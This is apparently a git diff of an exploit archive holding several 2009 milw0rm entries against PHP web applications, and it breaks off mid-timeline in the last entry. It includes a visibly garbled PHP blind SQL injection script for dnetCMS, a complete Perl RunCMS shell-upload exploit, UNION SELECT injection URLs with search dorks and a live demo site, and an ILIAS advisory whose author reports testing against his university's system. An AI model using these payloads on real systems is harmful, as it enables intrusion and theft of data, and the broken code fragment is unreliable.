++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+-           __           __     _       __                -
++      ____/ /___ ______/ /__  (_)___  / /_____  _____    +
+-     / __  / __ `/ ___/ //_/ / / __ \/ //_/ _ \/ ___/    -
++    / /_/ / /_/ / /  / ,<   / / /_/ / ,< /  __/ /        +
+-    \__,_/\__,_/_/  /_/|_|_/ /\____/_/|_|\___/_/         -
++                        /___/                            +
+-                                                         -
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+[+] Arbitrary Re-Installation Vulnerability
+
+There's no check about the elimination of 'help' directory, 
+then whenever an administrator forget to delete it, we can
+re-install the CMS, it means we can add a new administrator
+account, without specify database's informations.
+
+http://hostname/dnetCMS/help/install.php
+
+
+
+[+] Blind SQL Injection Exploit
+
+ \n".
+		"[+] Ex.     : php xpl.php localhost /dnetCMS/\n".
+		"[+] Greetz  : cristina, puccio (they kept me company when I coded this stuff :D)\n".
+		"\n");
+}
+
+function hex ($string) {
+	$i=0;
+	while ($iCannot modify:|", $reply)))
+		return false;
+	else
+		return true;
+}
+
+function get_field ($hostname, $path, $field) {
+	echo "[+] ".ucfirst($field)." (hash): ";
+	$chars = "abcdef0123456789";
+	for($i=0,$d=1;$d<=32;$i++) {
+		if (check ($hostname, $path, $chars [$i], $d, $field)) {
+			echo $chars [$i];
+			$i = -1;
+			$d++;
+		}
+	}
+	echo "\n";
+}
+
+if ($argc != 3)
+	usage ();
+$hostname = $argv [1];
+$path = $argv [2];
+$fields = array ("username", "password");
+foreach ($fields as $field)
+	get_field ($hostname, $path, $field);
+
+# milw0rm.com [2009-07-11]
diff --git a/platforms/php/webapps/9129.txt b/platforms/php/webapps/9129.txt
index 8387290e7..aa8dc31db 100755
--- a/platforms/php/webapps/9129.txt
+++ b/platforms/php/webapps/9129.txt
@@ -1,34 +1,34 @@
-================================================================================================
-
- Title    : (Blind SQL/XSS) Multiple Remote Vulnerabilities
- Software : Censura v1.16.04
- Vendor   : http://www.censura.info/
- 
- Date     : 12 July 2009 (Indonesia)
- Author   : Vrs-hCk
- Contact  : d00r@telkom.net
- Blog     : http://c0li.blogspot.com/
-
- ================================================================================================
-
- [-] Exploit
-
-     http://[site]/[path]/censura.php?cmd=details&itemid=[bSQL]
-     http://[site]/[path]/censura.php?cmd=details&itemid=[XSS]
-
- [-] Demo
-
-     http://www.yoozreviews.com/censura.php?cmd=details&itemid=61 and substring(@@version,1,1)=4
-     http://www.yoozreviews.com/censura.php?cmd=details&itemid=
-
- ================================================================================================
-
- Greetz   :
-
-     Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
-     bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh buat Dia yg Ku Cintai (*_^)
-     c0li.m0de.0n and Behave oR BeGone !!!
-
- ================================================================================================
-
-# milw0rm.com [2009-07-12]
+================================================================================================
+
+ Title    : (Blind SQL/XSS) Multiple Remote Vulnerabilities
+ Software : Censura v1.16.04
+ Vendor   : http://www.censura.info/
+ 
+ Date     : 12 July 2009 (Indonesia)
+ Author   : Vrs-hCk
+ Contact  : d00r@telkom.net
+ Blog     : http://c0li.blogspot.com/
+
+ ================================================================================================
+
+ [-] Exploit
+
+     http://[site]/[path]/censura.php?cmd=details&itemid=[bSQL]
+     http://[site]/[path]/censura.php?cmd=details&itemid=[XSS]
+
+ [-] Demo
+
+     http://www.yoozreviews.com/censura.php?cmd=details&itemid=61 and substring(@@version,1,1)=4
+     http://www.yoozreviews.com/censura.php?cmd=details&itemid=
+
+ ================================================================================================
+
+ Greetz   :
+
+     Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
+     bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh buat Dia yg Ku Cintai (*_^)
+     c0li.m0de.0n and Behave oR BeGone !!!
+
+ ================================================================================================
+
+# milw0rm.com [2009-07-12]
diff --git a/platforms/php/webapps/9132.py b/platforms/php/webapps/9132.py
index 5ea995d8b..d62e5ec04 100755
--- a/platforms/php/webapps/9132.py
+++ b/platforms/php/webapps/9132.py
@@ -1,118 +1,118 @@
-#!/usr/bin/perl
-
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #                                                           
-# RunCMS <= 1.6.3 "double ext" remote shell injection exploit #
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #                                                            
-#                                                             #
-# Note: you may upload files with double extension            #
-#       FCKEditor must be enabled for users                   #
-#                                                             #                                         
-#                                                             #
-# by staker                                                   #
-# ------------------------------                              #
-# mail: staker[at]hotmail[dot]it                              #
-# url: http://www.runcms.org                                  #
-# ------------------------------                              #
-# Discovered on 15 June 2009                                  #
-# Happy Birthday Irene                                        #
-# ----------------------------------------------------------- #
-
-
-use IO::Socket;
-use LWP::UserAgent;
-
-
-cronx_us();
-
-my ($host,$path,$username) = @ARGV;
-my $password = $ARGV[3] || exit;
-my $filename = "snippet.jpg.pwl"; # change it this is just an example
-
-shell_up();
-
-sub cronx_us() {
-        
-        print "[*------------------------------------------------------------*]\n".
-              "[* RunCMS <= 1.6.3 (fckeditor) remote shell injection exploit *]\n".
-              "[*------------------------------------------------------------*]\n". 
-              "[* Usage: perl web.pl [host] [path] [user] [pass]             *]\n".
-              "[*                                                            *]\n".
-              "[* Options:                                                   *]\n".
-              "[* [host] insert a valid host                                 *]\n".
-              "[* [path] insert a valid RunCMS path                          *]\n".
-              "[* [user] your username                                       *]\n".
-              "[* [pass] your password                                       *]\n".
-              "[*------------------------------------------------------------*]\n";
-}
-
-sub login() {    
-    
-    my $LWP = new LWP::UserAgent;
-    
-    my $post = $LWP->post(http_url($host)."/$path/user.php",
-                         [ uname => $username,
-                           pass  => $password,
-                           op    => 'login', 
-                         ]) || die $!;
-
-    if ($post->as_string =~ /Set-Cookie: (.*)/i) {
-        return $1;
-    }
-}
-
-sub http_url() {
-    
-    my $string = shift @_ || die($!);
-        
-    if ($string !~ /^http:\/\/?/i) {
-       return 'http://'.$string;
-    }  
-}
-
-
-sub shell_up() { 
-    
-     my ($data,$packet,$result);
-     my $cookie = login();
-
-
-     my $vector = chr(45) x27;
-     my $socket = new IO::Socket::INET(
-                                       PeerAddr => $host,
-                                       PeerPort => 80,
-                                       Proto    => 'tcp',
-                                     ) or die $!;
-        
-       
-     $data .= $vector."--uploading\r\n";
-     $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n";
-     $data .= "Content-Type: unknown/unknown\r\n\r\n";
-     $data .= "\r\n";
-     $data .= $vector."--uploading--\r\n";
-
-     $packet .= "POST $path/class/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
-     $packet .= "Content-Type: multipart/form-data; boundary=".$vector."uploading\r\n";
-     $packet .= "Host: $host\r\n";
-     $packet .= "Cookie: $cookie\r\n";
-     $packet .= "User-Agent :Lynx (textmode)\r\n";
-     $packet .= "Content-Length: ".length($data)."\r\n";
-     $packet .= "Connection: Close\r\n\r\n";
-     $packet .= $data;
-
-     $socket->send($packet);
-
-     foreach $result (<$socket>) { 
-          
-          if ($result =~ /file uploader is disabled/i) {
-             die("No access for you..\n");
-          }
-          else {   
-              print $result;
-          }    
-     }                
-}
-
-
-__END__
-
-# milw0rm.com [2009-07-13]
+#!/usr/bin/perl
+
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #                                                           
+# RunCMS <= 1.6.3 "double ext" remote shell injection exploit #
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #                                                            
+#                                                             #
+# Note: you may upload files with double extension            #
+#       FCKEditor must be enabled for users                   #
+#                                                             #                                         
+#                                                             #
+# by staker                                                   #
+# ------------------------------                              #
+# mail: staker[at]hotmail[dot]it                              #
+# url: http://www.runcms.org                                  #
+# ------------------------------                              #
+# Discovered on 15 June 2009                                  #
+# Happy Birthday Irene                                        #
+# ----------------------------------------------------------- #
+
+
+use IO::Socket;
+use LWP::UserAgent;
+
+
+cronx_us();
+
+my ($host,$path,$username) = @ARGV;
+my $password = $ARGV[3] || exit;
+my $filename = "snippet.jpg.pwl"; # change it this is just an example
+
+shell_up();
+
+sub cronx_us() {
+        
+        print "[*------------------------------------------------------------*]\n".
+              "[* RunCMS <= 1.6.3 (fckeditor) remote shell injection exploit *]\n".
+              "[*------------------------------------------------------------*]\n". 
+              "[* Usage: perl web.pl [host] [path] [user] [pass]             *]\n".
+              "[*                                                            *]\n".
+              "[* Options:                                                   *]\n".
+              "[* [host] insert a valid host                                 *]\n".
+              "[* [path] insert a valid RunCMS path                          *]\n".
+              "[* [user] your username                                       *]\n".
+              "[* [pass] your password                                       *]\n".
+              "[*------------------------------------------------------------*]\n";
+}
+
+sub login() {    
+    
+    my $LWP = new LWP::UserAgent;
+    
+    my $post = $LWP->post(http_url($host)."/$path/user.php",
+                         [ uname => $username,
+                           pass  => $password,
+                           op    => 'login', 
+                         ]) || die $!;
+
+    if ($post->as_string =~ /Set-Cookie: (.*)/i) {
+        return $1;
+    }
+}
+
+sub http_url() {
+    
+    my $string = shift @_ || die($!);
+        
+    if ($string !~ /^http:\/\/?/i) {
+       return 'http://'.$string;
+    }  
+}
+
+
+sub shell_up() { 
+    
+     my ($data,$packet,$result);
+     my $cookie = login();
+
+
+     my $vector = chr(45) x27;
+     my $socket = new IO::Socket::INET(
+                                       PeerAddr => $host,
+                                       PeerPort => 80,
+                                       Proto    => 'tcp',
+                                     ) or die $!;
+        
+       
+     $data .= $vector."--uploading\r\n";
+     $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n";
+     $data .= "Content-Type: unknown/unknown\r\n\r\n";
+     $data .= "\r\n";
+     $data .= $vector."--uploading--\r\n";
+
+     $packet .= "POST $path/class/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
+     $packet .= "Content-Type: multipart/form-data; boundary=".$vector."uploading\r\n";
+     $packet .= "Host: $host\r\n";
+     $packet .= "Cookie: $cookie\r\n";
+     $packet .= "User-Agent :Lynx (textmode)\r\n";
+     $packet .= "Content-Length: ".length($data)."\r\n";
+     $packet .= "Connection: Close\r\n\r\n";
+     $packet .= $data;
+
+     $socket->send($packet);
+
+     foreach $result (<$socket>) { 
+          
+          if ($result =~ /file uploader is disabled/i) {
+             die("No access for you..\n");
+          }
+          else {   
+              print $result;
+          }    
+     }                
+}
+
+
+__END__
+
+# milw0rm.com [2009-07-13]
diff --git a/platforms/php/webapps/9138.txt b/platforms/php/webapps/9138.txt
index b64e67d53..69def6a87 100755
--- a/platforms/php/webapps/9138.txt
+++ b/platforms/php/webapps/9138.txt
@@ -1,26 +1,26 @@
-#################################################################
-#		      _______ _________ _       		#
-#		     (  ____ )\__   __/( (    /|		#
-#		     | (    )|   ) (   |  \  ( |		#
-#		     | (____)|   | |   |   \ | |		#
-#		     |     __)   | |   | (\ \) |		#
-#		     | (\ (      | |   | | \   |		#
-#		     | ) \ \__   | |   | )  \  |		#
-#		     |/   \__/   )_(   |/    )_)		#
-#                        http://root-the.net 			#
-#################################################################
-#[+] onepund shop 1.x products.php SQL Injection Vulnerability  #
-#[+] Vendor : onepound.cn               #
-#[+] Exploit : Affix 			#
-#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead,  #
-#	      str0ke, tekto, SonicX, Android, tw0		#
-#[+] dork : "Powered by OnePound"				#
-#################################################################
-
-Example :
-   http://site.com/products.php?id='
-
-Demo :
-   http://site.com/products.php?id=-9+UNION+SELECT+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13--
-
-# milw0rm.com [2009-07-13]
+#################################################################
+#		      _______ _________ _       		#
+#		     (  ____ )\__   __/( (    /|		#
+#		     | (    )|   ) (   |  \  ( |		#
+#		     | (____)|   | |   |   \ | |		#
+#		     |     __)   | |   | (\ \) |		#
+#		     | (\ (      | |   | | \   |		#
+#		     | ) \ \__   | |   | )  \  |		#
+#		     |/   \__/   )_(   |/    )_)		#
+#                        http://root-the.net 			#
+#################################################################
+#[+] onepund shop 1.x products.php SQL Injection Vulnerability  #
+#[+] Vendor : onepound.cn               #
+#[+] Exploit : Affix 			#
+#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead,  #
+#	      str0ke, tekto, SonicX, Android, tw0		#
+#[+] dork : "Powered by OnePound"				#
+#################################################################
+
+Example :
+   http://site.com/products.php?id='
+
+Demo :
+   http://site.com/products.php?id=-9+UNION+SELECT+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13--
+
+# milw0rm.com [2009-07-13]
diff --git a/platforms/php/webapps/9145.php b/platforms/php/webapps/9145.php
index d21f6704e..40ca5a884 100755
--- a/platforms/php/webapps/9145.php
+++ b/platforms/php/webapps/9145.php
@@ -1,237 +1,237 @@
-
-
-# milw0rm.com [2009-07-14]
+
+
+# milw0rm.com [2009-07-14]
diff --git a/platforms/php/webapps/9150.txt b/platforms/php/webapps/9150.txt
index d9632ff4b..2034005ec 100755
--- a/platforms/php/webapps/9150.txt
+++ b/platforms/php/webapps/9150.txt
@@ -1,37 +1,37 @@
-###############################
-# Source: WordPress Plugin: My Category Order <= 2.8 (mycategoryorder.php) / SQL Injection Vulnerability
-# Download: http://wordpress.org/extend/plugins/my-category-order/
-# No Dork
-# Author: ManhLuat93 [at] hcegroup[dot]net
-###############################
-
-Errors appears only when you have admin control
-
-Open mycategoryorder.php (Line 47-48):
-if (isset($_GET['parentID']))
-$parentID = $_GET['parentID'];
-
-Fix:
-if (isset($_GET['parentID']))
-$parentID = intval($_GET['parentID']);
-
-
-[+] Exploit [+]
-
-
-http://localh0st/wp-admin/post-new.php?page=mycategoryorder&mode=act_OrderCategories&parentID=0'&idString=3,5,4,1
-
-MySQL Query Error:
-
-WordPress database error:
-
- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY term_order ASC' at line 1]
-SELECT * FROM wp_terms t inner join wp_term_taxonomy tt on t.term_id = tt.term_id WHERE taxonomy = 'category' and parent = 0' ORDER BY term_order ASC
-
-
-
-[+] http://localh0st/wp-admin/post-new.php?page=mycategoryorder&mode=act_OrderCategories&parentID=0 UNION SELECT 1,@@version,3,4,5,6,7,8,9,10,11--&idString=3,5,4,1
-
-[+] What do you see ?
-
-# milw0rm.com [2009-07-15]
+###############################
+# Source: WordPress Plugin: My Category Order <= 2.8 (mycategoryorder.php) / SQL Injection Vulnerability
+# Download: http://wordpress.org/extend/plugins/my-category-order/
+# No Dork
+# Author: ManhLuat93 [at] hcegroup[dot]net
+###############################
+
+Errors appears only when you have admin control
+
+Open mycategoryorder.php (Line 47-48):
+if (isset($_GET['parentID']))
+$parentID = $_GET['parentID'];
+
+Fix:
+if (isset($_GET['parentID']))
+$parentID = intval($_GET['parentID']);
+
+
+[+] Exploit [+]
+
+
+http://localh0st/wp-admin/post-new.php?page=mycategoryorder&mode=act_OrderCategories&parentID=0'&idString=3,5,4,1
+
+MySQL Query Error:
+
+WordPress database error:
+
+ [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY term_order ASC' at line 1]
+SELECT * FROM wp_terms t inner join wp_term_taxonomy tt on t.term_id = tt.term_id WHERE taxonomy = 'category' and parent = 0' ORDER BY term_order ASC
+
+
+
+[+] http://localh0st/wp-admin/post-new.php?page=mycategoryorder&mode=act_OrderCategories&parentID=0 UNION SELECT 1,@@version,3,4,5,6,7,8,9,10,11--&idString=3,5,4,1
+
+[+] What do you see ?
+
+# milw0rm.com [2009-07-15]
diff --git a/platforms/php/webapps/9151.txt b/platforms/php/webapps/9151.txt
index 98c073068..399c3974f 100755
--- a/platforms/php/webapps/9151.txt
+++ b/platforms/php/webapps/9151.txt
@@ -1,259 +1,259 @@
-***********************************************************************************************
-***********************************************************************************************
-**	       										     **
-**  											     **
-**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
-**     || || ||  []        [][]   []   []  []     []   []      [] []   []	 []    []    **
-** [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
-**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
-**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
-**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
-   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    **
-**							                                     **
-**    											     **
-**                           ME VOY A LA PLAYA!...QUE CALOoOoOoR!...Lo0oL                    **
-**					Ä„PROUD TO BE SPANISH!				     **
-**											     **
-***********************************************************************************************
-***********************************************************************************************
-
-----------------------------------------------------------------------------------------------
-|       	       MULTIPLE ARBITRARY INFORMATION DISCLOSURE AND EDITION       	     |
-|--------------------------------------------------------------------------------------------|
-|                              |    ILIAS LMS <= 3.10.7/3.9.9      |                         |
-|  CMS INFORMATION:	        -----------------------------------	                     |
-|										             |
-|-->WEB: http://www.ilias.de/				          	                     |
-|-->DOWNLOAD: http://www.ilias.de/docu/goto.php?target=st_229_35&client_id=docu		     |
-|-->DEMO: http://www.demo.ilias-support.com/  	     			                     |
-|-->CATEGORY: LMS/Education								     |
-|-->DESCRIPTION: ILIAS is a powerful web-based learning management system that allows you    |
-|		to easily manage learning resources in an integrated system. 	     	     |
-|-->RELEASED: 2009-06-22								     |
-|											     |
-|  CMS VULNERABILITY:                                    	                             |
-|											     |
-|-->TESTED ON: firefox 3								     |
-|-->DORK: "powered by ILIAS"	         				                     |
-|-->CATEGORY: ARBITRARY INFORMATION EDITION/DISCLOSURE		                             |
-|-->AFFECT VERSION: 3.10.7/3.9.9        		 			             |
-|-->Discovered Bug date: 2009-06-28							     |
-|-->Reported Bug date: 2009-06-28							     |
-|-->Fixed bug date: 2009-06-30								     |
-|-->Info patch (3.10.8/3.9.10): http://www.ilias.de/docu/goto.php?target=st_229_35           |
-| &client_id=docu                                                                            |
-|-->Author: YEnH4ckEr									     |
-|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
-|-->WEB/BLOG: N/A									     |
-|-->COMMENT: YEnH4ckEr <--<3--> Marijose.                                                    |
-| I'm going to rest for some time...J. Enrique y Pedro...wtf!?...algo sobre ILIAS!! ^_^      |
-----------------------------------------------------------------------------------------------
-
-
-
-<<<<---------++++++++++++++ Condition: registered user +++++++++++++++++--------->>>>
-
-
-
-I used my own account in my university...sorry for testing :P
-
-
-
-#################################
-/////////////////////////////////
-
-ARBITRARY INFORMATION DISCLOSURE
-
-/////////////////////////////////
-#################################
-
-
-
--------------------
--------------------
-
-"POST-ITS" ISSUE:
-
--------------------
--------------------
-
-
-
-When a user, teacher, admin, alumn, post a new post-its,
-he could read all post-its in database.
-
-The vuln link would be:
-
-http://[HOST]/[PATH]/ilias.php?col_side=right&block_type=pdnotes&rel_obj=0¬e_id=1¬e_type=1&cmd=showNote&cmdClass=ilpdnotesblockgui&cmdNode=50&baseClass=ilPersonalDesktopGUI
-
-
-Changing note_id=1 for other value, for ex. 100, we could
-read this posts-it.
-
-That seems a low risk vuln but, when i tested on-line, ie,
-against my university and i've got a lot of sensitive information.
-
-
-
--------------------
--------------------
-
-"CMD" ISSUE:
-
--------------------
--------------------
-
-
-
-Course/group/... calendars:
-
-This would be a normal link:
-
-
-http://[HOST]/[PATH]/repository.php?cmd=frameset&ref_id=50438
-
-
-But if I change cmd=frameset for cmd=edit:
-
-
-http://[HOST]/[PATH]/repository.php?ref_id=50438&cmd=edit
-
-
-I access to information about this group/course/..., and I tried to
-change it, but i got permission denied...anyway, i
-can get how it's configured this group/course/...
-
-
-
--------------------
--------------------
-
-"CALENDAR" ISSUE:
-
--------------------
--------------------
-
-
-
-http://[HOST]/[PATH]/ilias.php?seed=2009-06-28&category_id=847&calendar_mode=2&cmd=edit&cmdClass=ilcalendarcategorygui&cmdNode=6&baseClass=ilPersonalDesktopGUI
-
-
-Changing category_id, it shows sensitive information about
-any course/group/...
-
-Personal and global calendars are secure.
-
-
-
-#########################################
-/////////////////////////////////////////
-
-ARBITRARY INFORMATION DISCLOSURE/EDITION
-
-/////////////////////////////////////////
-#########################################
-
-
-
-This module (favorite) allows to get a repository of favorite links
-
-
-
--------------------
--------------------
-
-"FAVORITE" ISSUE:
-
--------------------
--------------------
-
-
-This would be the vuln link:
-
-
-http://[HOST]/[PATH]/ilias.php?bmf_id=1&obj_id=926&cmd=editFormBookmark&cmdClass=ilbookmarkadministrationgui&cmdNode=2&baseClass=ilPersonalDesktopGUI
-
-
-GET var 'obj_id' is the vuln var...changing for other value you can view and edit any favorite link.
-
-
-User (victim) trusts in these links (He posts them)
-
-
-
-############
-////////////
-
-VIDEOS DEMO
-
-////////////
-############
-
-
-
-ARBITRARY INFORMATION DISCLOSURE AND EDITION ("FAVORITES") --> http://www.youtube.com/watch?v=i6D6UVR0358
-
-ARBITRARY INFORMATION DISCLOSURE ("POST-ITS") --> http://www.youtube.com/watch?v=eSPp1dswe1E
-
-
-
-####################
-////////////////////
-
-DISCLOSURE TIMELINE
-
-////////////////////
-####################
-
-
-
-
-**2009-06-28**  ~~~~~> FIRST VULNS DISCOVERED
-
-**2009-06-29**  ~~~~~> VULN REPORTED TO VENDOR
-
-**2009-06-29**  ~~~~~> OTHER SECURITY ISSUE DISCOVERED
-
-**2009-06-29**  ~~~~~> VULN REPORTED TO VENDOR WITH VIDEO AND REPORT
-
-**2009-06-30**  ~~~~~> VENDOR RESPONSED
-
-**2009-06-30**  ~~~~~> VENDOR CONFIRMED SECURITY ISSUES
-
-**2009-06-30**  ~~~~~> VENDOR FIXED SECURITY ISSUES IN SVN FOR 3.9/3.10/Trunk (AND CONFIRMS 3.9 AFFECTED)
-
-**2009-06-30**  ~~~~~> VENDOR CLARIFIED SECURITY ISSUES: "Confirm that all your exploits work in the latest published official release"
-
-**2009-07-01**  ~~~~~> VENDOR CONFIRMED NEXT RELEASE WILL CONTAIN THE FIXES
-
-**2009-07-01**  ~~~~~> I WILL WAIT NEXT RELEASE FOR FULL DISCLOSURE
-
-**2009-07-08**  ~~~~~> ILIAS LAUNCHED NEW STABLE RELEASE (3.10.8 / 3.9.10)
-
-**2009-07-11**  ~~~~~> I CONTACTED AGAIN TO SAY A DISCLOSURE DATE, STABLISHED FOR 2009-07-15 (WAIT ONE WEEK AFTER NEW RELEASE...)
-
-**2009-07-12**  ~~~~~> ILIAS AGREE WITH THIS DATE AND POSTED A LINK FOR CREDITS
-
-**2009-07-15**  ~~~~~> FULL DISCLOSURE...PUBLISHED ADVISORY.
-
-
-
-
-<<<-----------------------------EOF---------------------------------->>>ENJOY IT!
-
-
-
-
-##############################################################################
-##############################################################################
-##**************************************************************************##
-##         SPECIAL THANKS TO: MILW0RM FOREVER!!...STR0KE THE BEST!          ##
-##**************************************************************************##
-##--------------------------------------------------------------------------##
-##**************************************************************************##
-## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
-##**************************************************************************##
-##############################################################################
-##############################################################################
-
-# milw0rm.com [2009-07-15]
+***********************************************************************************************
+***********************************************************************************************
+**	       										     **
+**  											     **
+**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
+**     || || ||  []        [][]   []   []  []     []   []      [] []   []	 []    []    **
+** [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
+**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
+**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
+**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
+   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    **
+**							                                     **
+**    											     **
+**                           ME VOY A LA PLAYA!...QUE CALOoOoOoR!...Lo0oL                    **
+**					Ä„PROUD TO BE SPANISH!				     **
+**											     **
+***********************************************************************************************
+***********************************************************************************************
+
+----------------------------------------------------------------------------------------------
+|       	       MULTIPLE ARBITRARY INFORMATION DISCLOSURE AND EDITION       	     |
+|--------------------------------------------------------------------------------------------|
+|                              |    ILIAS LMS <= 3.10.7/3.9.9      |                         |
+|  CMS INFORMATION:	        -----------------------------------	                     |
+|										             |
+|-->WEB: http://www.ilias.de/				          	                     |
+|-->DOWNLOAD: http://www.ilias.de/docu/goto.php?target=st_229_35&client_id=docu		     |
+|-->DEMO: http://www.demo.ilias-support.com/  	     			                     |
+|-->CATEGORY: LMS/Education								     |
+|-->DESCRIPTION: ILIAS is a powerful web-based learning management system that allows you    |
+|		to easily manage learning resources in an integrated system. 	     	     |
+|-->RELEASED: 2009-06-22								     |
+|											     |
+|  CMS VULNERABILITY:                                    	                             |
+|											     |
+|-->TESTED ON: firefox 3								     |
+|-->DORK: "powered by ILIAS"	         				                     |
+|-->CATEGORY: ARBITRARY INFORMATION EDITION/DISCLOSURE		                             |
+|-->AFFECT VERSION: 3.10.7/3.9.9        		 			             |
+|-->Discovered Bug date: 2009-06-28							     |
+|-->Reported Bug date: 2009-06-28							     |
+|-->Fixed bug date: 2009-06-30								     |
+|-->Info patch (3.10.8/3.9.10): http://www.ilias.de/docu/goto.php?target=st_229_35           |
+| &client_id=docu                                                                            |
+|-->Author: YEnH4ckEr									     |
+|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
+|-->WEB/BLOG: N/A									     |
+|-->COMMENT: YEnH4ckEr <--<3--> Marijose.                                                    |
+| I'm going to rest for some time...J. Enrique y Pedro...wtf!?...algo sobre ILIAS!! ^_^      |
+----------------------------------------------------------------------------------------------
+
+
+
+<<<<---------++++++++++++++ Condition: registered user +++++++++++++++++--------->>>>
+
+
+
+I used my own account in my university...sorry for testing :P
+
+
+
+#################################
+/////////////////////////////////
+
+ARBITRARY INFORMATION DISCLOSURE
+
+/////////////////////////////////
+#################################
+
+
+
+-------------------
+-------------------
+
+"POST-ITS" ISSUE:
+
+-------------------
+-------------------
+
+
+
+When a user, teacher, admin, alumn, post a new post-its,
+he could read all post-its in database.
+
+The vuln link would be:
+
+http://[HOST]/[PATH]/ilias.php?col_side=right&block_type=pdnotes&rel_obj=0¬e_id=1¬e_type=1&cmd=showNote&cmdClass=ilpdnotesblockgui&cmdNode=50&baseClass=ilPersonalDesktopGUI
+
+
+Changing note_id=1 for other value, for ex. 100, we could
+read this posts-it.
+
+That seems a low risk vuln but, when i tested on-line, ie,
+against my university and i've got a lot of sensitive information.
+
+
+
+-------------------
+-------------------
+
+"CMD" ISSUE:
+
+-------------------
+-------------------
+
+
+
+Course/group/... calendars:
+
+This would be a normal link:
+
+
+http://[HOST]/[PATH]/repository.php?cmd=frameset&ref_id=50438
+
+
+But if I change cmd=frameset for cmd=edit:
+
+
+http://[HOST]/[PATH]/repository.php?ref_id=50438&cmd=edit
+
+
+I access to information about this group/course/..., and I tried to
+change it, but i got permission denied...anyway, i
+can get how it's configured this group/course/...
+
+
+
+-------------------
+-------------------
+
+"CALENDAR" ISSUE:
+
+-------------------
+-------------------
+
+
+
+http://[HOST]/[PATH]/ilias.php?seed=2009-06-28&category_id=847&calendar_mode=2&cmd=edit&cmdClass=ilcalendarcategorygui&cmdNode=6&baseClass=ilPersonalDesktopGUI
+
+
+Changing category_id, it shows sensitive information about
+any course/group/...
+
+Personal and global calendars are secure.
+
+
+
+#########################################
+/////////////////////////////////////////
+
+ARBITRARY INFORMATION DISCLOSURE/EDITION
+
+/////////////////////////////////////////
+#########################################
+
+
+
+This module (favorite) allows to get a repository of favorite links
+
+
+
+-------------------
+-------------------
+
+"FAVORITE" ISSUE:
+
+-------------------
+-------------------
+
+
+This would be the vuln link:
+
+
+http://[HOST]/[PATH]/ilias.php?bmf_id=1&obj_id=926&cmd=editFormBookmark&cmdClass=ilbookmarkadministrationgui&cmdNode=2&baseClass=ilPersonalDesktopGUI
+
+
+GET var 'obj_id' is the vuln var...changing for other value you can view and edit any favorite link.
+
+
+User (victim) trusts in these links (He posts them)
+
+
+
+############
+////////////
+
+VIDEOS DEMO
+
+////////////
+############
+
+
+
+ARBITRARY INFORMATION DISCLOSURE AND EDITION ("FAVORITES") --> http://www.youtube.com/watch?v=i6D6UVR0358
+
+ARBITRARY INFORMATION DISCLOSURE ("POST-ITS") --> http://www.youtube.com/watch?v=eSPp1dswe1E
+
+
+
+####################
+////////////////////
+
+DISCLOSURE TIMELINE
+
+////////////////////
+####################
+
+
+
+
+**2009-06-28**  ~~~~~> FIRST VULNS DISCOVERED
+
+**2009-06-29**  ~~~~~> VULN REPORTED TO VENDOR
+
+**2009-06-29**  ~~~~~> OTHER SECURITY ISSUE DISCOVERED
+
+**2009-06-29**  ~~~~~> VULN REPORTED TO VENDOR WITH VIDEO AND REPORT
+
+**2009-06-30**  ~~~~~> VENDOR RESPONSED
+
+**2009-06-30**  ~~~~~> VENDOR CONFIRMED SECURITY ISSUES
+
+**2009-06-30**  ~~~~~> VENDOR FIXED SECURITY ISSUES IN SVN FOR 3.9/3.10/Trunk (AND CONFIRMS 3.9 AFFECTED)
+
